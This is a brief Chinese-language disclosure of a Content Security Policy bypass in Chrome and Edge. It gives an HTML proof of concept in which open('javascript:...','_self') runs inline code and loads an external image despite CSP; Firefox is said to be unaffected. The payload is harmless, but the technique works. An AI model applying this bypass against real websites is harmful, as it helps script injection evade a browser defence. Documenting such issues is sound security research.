Chrome && Microsoft Edge CSP Bypass(unsafe-inline)

当CSP为unsafe-inline时,可以通过这种方法绕过。

在测试时候发现,open("javascript:XX","_self")会运行内部的代码,从而bypass csp。

<html>
 <meta charset="utf-8">
 <body> 
<script>
open("javascript:'<img src=http://himg2.huanqiu.com/attachment2010/2017/0117/07/37/20170117073724775.jpg>'","_self"); 
</script>
 </body> 
</html>

chrome和edge都存在这个问题,但是firefox没有这个问题。